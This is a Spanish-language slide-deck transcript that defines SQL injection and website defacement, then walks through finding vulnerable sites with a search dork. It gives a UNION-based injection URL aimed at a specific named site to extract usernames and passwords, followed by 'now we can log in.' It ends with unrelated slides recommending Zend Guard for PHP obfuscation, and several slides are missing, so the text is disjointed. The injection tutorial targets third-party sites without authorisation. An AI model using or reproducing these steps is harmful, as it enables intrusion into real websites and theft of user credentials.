Este documento describe SQL Inyección, un tipo de vulnerabilidad que permite inyectar código malicioso en una base de datos. Explica cómo buscar sitios vulnerables y obtener nombres de usuarios y contraseñas al manipular parámetros de consultas SQL. También menciona ofuscar código PHP para proteger productos de desarrolladores de copias no autorizadas.

1. SQL Injection

2. ¿Que es SQL Injection? Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.

3. ¿Que es Deface? El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.

4. Pasos: Buscando website vulnerable. Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "=" Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.

10. Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2. Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass). http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGES Si no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.

11. OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS

12. OFUSCAR CODIGO EN PHP: Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.

13. ¿Cómo evitar esto? La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas. En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.